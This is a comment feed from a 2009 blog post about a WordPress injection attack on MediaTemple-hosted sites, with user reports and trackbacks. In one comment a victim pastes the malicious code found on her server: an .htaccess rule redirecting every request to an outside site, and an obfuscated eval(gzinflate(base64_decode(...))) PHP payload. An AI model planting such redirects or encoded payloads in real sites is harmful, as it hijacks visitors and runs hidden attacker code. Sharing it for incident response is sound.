Wordpress, MediaTemple, and an Injection Attack [Expose]Comments on: http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/ coherent thoughts on diverse topics Sun, 21 Mar 2010 03:24:23 -0700 http://wordpress.org/?v=2.9.2 hourly 1 By: Media Temple Grid (gs) Review: F- #doublefail | vps hosting reviews http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#comment-4013 Media Temple Grid (gs) Review: F- #doublefail | vps hosting reviews Wed, 24 Feb 2010 04:50:20 +0000 http://www.kyle-brady.com/?p=5117#comment-4013 [...] http://www.kyle-brady.com/2009/11/07…ection-attack/ [...] [...] http://www.kyle-brady.com/2009/11/07…ection-attack/ [...]

]]> By: Image Searchers Snared By Malware | JetLib News http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#comment-3994 Image Searchers Snared By Malware | JetLib News Thu, 04 Feb 2010 15:38:22 +0000 http://www.kyle-brady.com/?p=5117#comment-3994 [...] to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being [...] [...] to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being [...]

]]> By: Kyle Brady http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#comment-3927 Kyle Brady Mon, 28 Dec 2009 22:47:49 +0000 http://www.kyle-brady.com/?p=5117#comment-3927 Interesting - maybe the (mt) exploit was adapted for another host?<br><br>I'm not sure what to tell you, other than your results are strikingly similar to mine and many others'.<br><br>--Kyle Interesting – maybe the (mt) exploit was adapted for another host?

I'm not sure what to tell you, other than your results are strikingly similar to mine and many others'.

–Kyle

]]> By: Sarah http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#comment-3926 Sarah Mon, 28 Dec 2009 21:40:20 +0000 http://www.kyle-brady.com/?p=5117#comment-3926 May be worth pointing out I'm not a MT customer, I use a different UK host. May be worth pointing out I'm not a MT customer, I use a different UK host.

]]> By: Sarah http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#comment-3925 Sarah Mon, 28 Dec 2009 21:32:09 +0000 http://www.kyle-brady.com/?p=5117#comment-3925 Thanks for the info. I had this on an old wordpress blog I hadn't updated since Feb - looks like it only got compromised on the 26th December (today being the 28th), I had comments/trackbacks disabled too.<br><br>In my case something seemed amiss when I logged in to "Add Post" and the page didn't format properly. As the dashboard suggested I was running an old version I did the "recommended" upgrade to 2.9. The webpage then informed me my database also needed upgrading - when I clicked on this link I got redirected to <a href="http://thecreativevirus.com" rel="nofollow">thecreativevirus.com</a>. Apart from the suspicious-sounding name, this website tried to get me to install some software to view a "video" - I had to kill the web browser to get it to leave this page & am currently running a virus scan.<br><br>Logging on to the webserver, I discovered at the bottom of the .htaccess file:<br>RewriteRule .* <a href="http://you-search.in/in.cgi?4&parameter=ku" rel="nofollow">http://you-search.in/in.cgi?4&parameter=ku</a> [R,L]<br><br>and at the bottom of an index.html file:<br><br>eval(gzinflate(base64_decode('dVFda8IwFH0X/A+XEpaGldj6AXNSpg9FXybD1b1MKV2b2GBNStpOxth/X+I+3MOEhOTec8/NuSdoXTM92zHZQAh1oxtVqiPTLkoeo9VTtHrGizh+SNYmSmbzaBnjLZl0O4K7prhStYt+G3iAd0rtSoYJKA3f+F/4LS2UuogeankRK8WraUu6nfduBwBpIxbjib0bJYiHU16rbK8qJl0cjEc0GPs0GND+YIS9G99DzCztBT6BVOYw5VXbGOncA2cexdArhdyLpickrYrqLleHVMjQAQqtLpnMVM7OhjhfZ7Kc3UfOlpgi56o1UlMr9RLpHxctEWy6F1B/ozdyoermFg6+ZlRIm7DbsUMDHAtRMhdQaQbnmqX5SXzg94eEWDtoaLCTH1Oelao2T3NyilEV/vyU9pxz2wmwrFBQty8GthiqroeW8vEJ')));<br><br>These files in both public_html and (more worryingly) its parent directory contained this dodgy code. As the blog & indeed the website only had 2 posts I am just doing a completely clean install, having changed all the passwords I can find & deleted the old database.<br><br>I hadn't installed ANY plugins, just one theme. Thanks for the info. I had this on an old wordpress blog I hadn't updated since Feb – looks like it only got compromised on the 26th December (today being the 28th), I had comments/trackbacks disabled too.

In my case something seemed amiss when I logged in to “Add Post” and the page didn't format properly. As the dashboard suggested I was running an old version I did the “recommended” upgrade to 2.9. The webpage then informed me my database also needed upgrading – when I clicked on this link I got redirected to thecreativevirus.com. Apart from the suspicious-sounding name, this website tried to get me to install some software to view a “video” – I had to kill the web browser to get it to leave this page & am currently running a virus scan.

Logging on to the webserver, I discovered at the bottom of the .htaccess file:
RewriteRule .* http://you-search.in/in.cgi?4&parameter=ku [R,L]

and at the bottom of an index.html file:

eval(gzinflate(base64_decode('dVFda8IwFH0X/A+XEpaGldj6AXNSpg9FXybD1b1MKV2b2GBNStpOxth/X+I+3MOEhOTec8/NuSdoXTM92zHZQAh1oxtVqiPTLkoeo9VTtHrGizh+SNYmSmbzaBnjLZl0O4K7prhStYt+G3iAd0rtSoYJKA3f+F/4LS2UuogeankRK8WraUu6nfduBwBpIxbjib0bJYiHU16rbK8qJl0cjEc0GPs0GND+YIS9G99DzCztBT6BVOYw5VXbGOncA2cexdArhdyLpickrYrqLleHVMjQAQqtLpnMVM7OhjhfZ7Kc3UfOlpgi56o1UlMr9RLpHxctEWy6F1B/ozdyoermFg6+ZlRIm7DbsUMDHAtRMhdQaQbnmqX5SXzg94eEWDtoaLCTH1Oelao2T3NyilEV/vyU9pxz2wmwrFBQty8GthiqroeW8vEJ')));

These files in both public_html and (more worryingly) its parent directory contained this dodgy code. As the blog & indeed the website only had 2 posts I am just doing a completely clean install, having changed all the passwords I can find & deleted the old database.

I hadn't installed ANY plugins, just one theme.

]]> By: karl http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#comment-3888 karl Mon, 30 Nov 2009 15:04:26 +0000 http://www.kyle-brady.com/?p=5117#comment-3888 It seems Mediatemple is working on it. (I got my password changed for me, without being targeted for the attack.)<br><br><a href="http://weblog.mediatemple.net/weblog/2009/11/29/1026-our-work-continues/" rel="nofollow">http://weblog.mediatemple.net/weblog/2009/11/29...</a> It seems Mediatemple is working on it. (I got my password changed for me, without being targeted for the attack.)

http://weblog.mediatemple.net/weblog/2009/11/29...

]]> By: MediaTemple index.php Injection Analysis – bundyxc.com http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#comment-3881 MediaTemple index.php Injection Analysis – bundyxc.com Sun, 29 Nov 2009 21:30:22 +0000 http://www.kyle-brady.com/?p=5117#comment-3881 [...] So the first part of the code isn’t too harmful… it’s just a link. But this second part downloads the entire page, and displays it on your website. That is definitely not good. However, if you were affected, don’t worry… the fix seems to be relatively simple. [...] [...] So the first part of the code isn’t too harmful… it’s just a link. But this second part downloads the entire page, and displays it on your website. That is definitely not good. However, if you were affected, don’t worry… the fix seems to be relatively simple. [...]

]]> By: Christian Bundy http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#comment-3882 Christian Bundy Sun, 29 Nov 2009 18:33:13 +0000 http://www.kyle-brady.com/?p=5117#comment-3882 Just wanted to point out that the eval() code is not javascript, it's definitely PHP. I've taken the code apart, and posted an analysis of the eval() injection at my blog.<br><br><a href="http://bundyxc.com/?p=95" rel="nofollow">http://bundyxc.com/?p=95</a> Just wanted to point out that the eval() code is not javascript, it's definitely PHP. I've taken the code apart, and posted an analysis of the eval() injection at my blog.

http://bundyxc.com/?p=95

]]> By: Media Temple Security Issues http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#comment-3869 Media Temple Security Issues Fri, 27 Nov 2009 06:18:26 +0000 http://www.kyle-brady.com/?p=5117#comment-3869 [...] from Media Temple. Apparently a number of people have received this email and some have had some fairly serious security exploits with their WordPress installs. If you’d like to read more into the problem, Kyle Brady has [...] [...] from Media Temple. Apparently a number of people have received this email and some have had some fairly serious security exploits with their WordPress installs. If you’d like to read more into the problem, Kyle Brady has [...]

]]> By: Kyle Rush http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#comment-3870 Kyle Rush Fri, 27 Nov 2009 03:21:12 +0000 http://www.kyle-brady.com/?p=5117#comment-3870 I received the same email from Media Temple on the 25th, but, so far, haven't noticed any of the things mentioned in this post. I did however notice that the title and content of just one of my WordPress posts had been altered. More on that here: <a href="http://kylerush.net/cms/media-temple-security-issues/" rel="nofollow">http://kylerush.net/cms/media-temple-security-i...</a> I received the same email from Media Temple on the 25th, but, so far, haven't noticed any of the things mentioned in this post. I did however notice that the title and content of just one of my WordPress posts had been altered. More on that here: http://kylerush.net/cms/media-temple-security-i...

]]>